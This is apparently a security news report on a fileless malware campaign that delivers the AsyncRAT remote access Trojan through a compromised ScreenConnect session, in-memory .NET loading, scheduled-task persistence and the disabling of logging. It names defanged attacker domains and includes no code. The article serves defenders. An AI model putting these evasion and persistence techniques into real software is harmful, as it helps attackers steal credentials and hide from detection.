Stealthy Fileless Malware Spreads RAT via Legitimate Tools
▼ Summary
– A fileless malware campaign uses legitimate tools like ScreenConnect to bypass disk-based detection by executing malicious code entirely in memory.
– The attack begins with a compromised ScreenConnect client, leading to the execution of a VBScript that downloads and loads payloads directly into memory without writing files to disk.
– A first-stage .NET assembly, Obfuscator.dll, establishes persistence via a scheduled task and disables Windows security logging to evade detection.
– The malware ultimately delivers AsyncRAT, a remote access Trojan that performs reconnaissance, executes commands, and exfiltrates sensitive data like credentials and browser artifacts.
– Researchers emphasize that understanding these techniques enables the creation of targeted detection signatures and supports endpoint hardening against such threats.
A highly sophisticated fileless malware operation has been identified, leveraging trusted system utilities to distribute a dangerous remote access Trojan while evading conventional security measures. This in-memory attack strategy leaves minimal forensic traces, complicating both detection and remediation efforts for defenders.
Security analysts have traced the infection chain to a compromised ScreenConnect client, a popular remote administration tool. Attackers initiated an interactive session using the domain relay.shipperzone[.]online, which has been associated with unauthorized deployments of the software. Within this session, a VBScript named Update.vbs was executed via WScript, triggering a PowerShell command to retrieve two payloads from the internet.
These payloads, identified as logs.ldk and logs.ldr, were saved within the C:\Users\Public\ directory but never persisted as executable files on the disk. Instead, they were loaded directly into memory using reflection techniques. One payload was transformed into a byte array, while the other was executed in-memory. The script fetched encoded data from a remote server, decoded it within memory, and invoked a .NET assembly to proceed with the attack, a signature characteristic of fileless malware campaigns.
The infection process then advanced with a first-stage .NET assembly called Obfuscator.dll, which served as a launcher for the AsyncRAT payload. Analysis uncovered three central classes within this component:
- Class A, responsible for initializing the runtime environment: This modular architecture allowed the malware to operate discreetly while preparing the system for the final stage of the attack.
- AsyncClient.exe functioned as the command-and-control engine, maintaining persistent access, conducting system reconnaissance, and executing commands issued by the attacker.
- Its capabilities included decrypting embedded settings using AES-256 encryption, including C2 server domains such as 3osch20[.]duckdns[.]org.
By deconstructing these elements, cybersecurity professionals can better understand how the malware achieves persistence, loads additional modules dynamically, and harvests sensitive data such as credentials, clipboard contents, and browser artifacts. These insights are instrumental in developing targeted detection rules and strengthening endpoint defenses based on observed malicious behaviors.
(Source: Infosecurity Magazine)
